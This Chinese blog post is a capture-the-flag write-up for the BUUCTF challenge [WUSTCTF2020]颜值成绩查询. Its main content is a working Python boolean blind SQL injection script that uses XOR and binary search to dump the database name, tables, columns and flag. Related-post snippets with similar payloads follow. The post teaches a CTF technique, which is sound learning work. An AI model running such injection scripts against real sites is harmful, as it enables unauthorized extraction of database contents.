[WUSTCTF2020]颜值成绩查询

最新推荐文章于 2023-01-27 20:45:56 发布
最新推荐文章于 2023-01-27 20:45:56 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: buuctf 文章标签: sql ctf web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pakho_C/article/details/126329817
版权

[WUSTCTF2020]颜值成绩查询
在这里插入图片描述
测试输入1-5 各有输出,1为 Hi admin, your score is: 100
在这里插入图片描述
0和大于6的显示 student number not exists.
在这里插入图片描述
猜测是盲注
参考我做的另外一道题的[极客大挑战 2019]FinalSQL

这里好像没做过滤,直接用脚本跑就行:
获取数据库名:

def getDataBase():          #获取数据库名
    database_name = ""
    for i in range(1,1000):     #注意是从1开始,substr函数从第一个字符开始截取
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:       #二分法
            params={
                "stunum":"0^(ascii(substr((select(database())),"+str(i)+",1))>"+str(mid)+")" #注意select(database())要用()包裹起来
            }
            r = requests.get(url=target,params=params)
            if "admin" in r.text:      #为真时说明该字符在ascii表后面一半
                low = mid+1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127: #判断结束,退出循环
            break
        database_name += chr(mid)   #将ascii码转换为字符
    print("数据库名:" + database_name)

在这里插入图片描述
得到数据库名为ctf
获取表名:

def getTable():     #获取表名
    column_name=""
    for i in range(1,1000):
        low = 32
        high = 127
        mid = (low+high)//2
        while low<high:
            params = {
                "stunum": "0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target,params=params)
            if "admin" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127:
            break
        column_name += chr(mid)
    print("表名为:"+column_name)

在这里插入图片描述
得到表名为flag和score
在flag表中查询字段名:

def getColumn():        #获取列名
    column_name = ""
    for i in range(1,250):
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:
            params = {
                "stunum": "0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target, params=params)
            if 'admin' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if low <= 32 or high >= 127:
            break
        column_name += chr(mid)
    print("列名为:" + column_name)

在这里插入图片描述
得到字段名为flag,value
查询flag表中的value字段:

def getFlag():
    flag = ""
    for i in range(1,1000):
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:
            params = {
                "stunum" : "0^(ascii(substr((select(group_concat(value))from(flag)),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target, params=params)
            if 'admin' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127:
            break
        flag += chr(mid)
    print("flag:" + flag)

得到flag
在这里插入图片描述
完整代码:

import requests

target = "http://85b20fea-732d-49f4-a883-d20a10a9f3d3.node4.buuoj.cn:81/" 

def getDataBase():          #获取数据库名
    database_name = ""
    for i in range(1,1000):     #注意是从1开始,substr函数从第一个字符开始截取
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:       #二分法
            params={
                "stunum":"0^(ascii(substr((select(database())),"+str(i)+",1))>"+str(mid)+")" #注意select(database())要用()包裹起来
            }
            r = requests.get(url=target,params=params)
            if "admin" in r.text:      #为真时说明该字符在ascii表后面一半
                low = mid+1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127:    #判断结束,退出循环
            break
        database_name += chr(mid)   #将ascii码转换为字符
    print("数据库名:" + database_name)


def getTable():     #获取表名
    column_name=""
    for i in range(1,1000):
        low = 32
        high = 127
        mid = (low+high)//2
        while low<high:
            params = {
                "stunum": "0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target,params=params)
            if "admin" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127:
            break
        column_name += chr(mid)
    print("表名为:"+column_name)


def getColumn():        #获取列名
    column_name = ""
    for i in range(1,250):
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:
            params = {
                "stunum": "0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target, params=params)
            if 'admin' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if low <= 32 or high >= 127:
            break
        column_name += chr(mid)
    print("列名为:" + column_name)


def getFlag():
    flag = ""
    for i in range(1,1000):
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:
            params = {
                "stunum" : "0^(ascii(substr((select(group_concat(value))from(flag)),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target, params=params)
            if 'admin' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127:
            break
        flag += chr(mid)
    print("flag:" + flag)


#getDataBase()
#getTable()
#getColumn()
getFlag()
pakho_C
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 648
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
[WUSTCTF2020]颜值成绩查询1
最新发布
alwtj的博客
06-10 356
又试了试报错闭合,联合注入之类的,结果输出的都是student number not exists.测试了一下从1输到了5,第五个显示 student number not exists.开局一个输入框,输入number查询成绩,还有2行报错,典型的sql注入题~没有出错,说明payload构建成功,那就开始写python代码~这段代码用了二分查找,开始执行~输入1 0 0 / 1 0 0。没有出错,说明空格被过滤了~获得flag,游戏结束~构造一下payload。
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 781
[WUSTCTF2020]颜值成绩查询(布尔注入)
re学习笔记(56)WUSTCTF – Re方向WP
12-21
文章以一系列WUSTCTF逆向工程挑战为例,展示了如何利用逆向工程技术来解密和获取隐藏的flag。 首先,让我们看看WUSTCTF的"re-Cr0ssFun"挑战。在这个问题中,作者使用了IDA64(Interactive Disassembler)来加载64位...
linux操作系统入门实验报告
03-09
**Linux操作系统入门实验报告** 本实验报告主要针对Linux操作系统的基础知识和操作技能进行阐述,旨在帮助初学者快速熟悉这一开源操作系统。实验过程中,我们将通过实际操作来了解和掌握Linux的基本命令行界面,...
Flash8help_cn.part4
01-13
Flash8help_cn.part4.共有6卷,须全部下载才能解压缩。flash 教程 帮助文档 动漫 计算机
23种设计模式汇集       
07-09
### 23种设计模式汇集知识点详解 #### 设计模式概览 设计模式是一套被反复使用、多数人知晓的、经过分类编目的、代码设计经验的总结。它描述了在软件设计过程中的一些不断重复发生的问题,以及该问题的解决方案。...
[WUSTCTF2020]颜值成绩
shinygod的博客
04-09 433
知识点:布尔盲注 当我们输入1,2,3,4的时候都有回显,但是当输入5的时候会回显 判断布尔盲注,测试一波 这种显示不存在 1'and length(database()) >1# 当用异或注入的时候显示正确1^1^1,并回显Hi admin,这样我们就可以由此来盲注。 import re import requests import string url = "http://ebb62726-0fba-430e-bf27-5e7214c31577.node4.buuoj.cn:81/" f
[WUSTCTF2020]颜值成绩查询 -wp
freerats的博客
08-05 584
改变参数stunum发现页面会发生变化。 通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。 写脚本跑一下: import requests url='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php' flag='' for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
BUUCTF:[WUSTCTF2020]颜值成绩查询
末初的CSDN博客
04-07 1529
SQL盲注 2^if(ascii(mid(database(),1,1))>0,0,1); 先fuzz测试查看有没有过滤了什么,这里过滤了空格,但是我们可以收用/**/来分隔sql语句 先看我根据我的一篇文章布尔型盲注python脚本(功能超级完整)改的脚本 import requests def ascii_str(): # 生成库名表名字符所在的字符列表字典 str_li...
SQL布尔盲注 —— 【WUST-CTF2020】颜值成绩查询
Ve99tr’s Blog
03-30 1919
sql布尔盲注
[WUSTCTF2020]朴实无华
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的md5值等于$md5本身,会输出另一条特定的字符串。在第三个关卡中,如果传入的参数$get_flag中不包含空格,则会将$get_flag传给系统函数进行执行,并输出一条特定的字符串。 关于题目的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值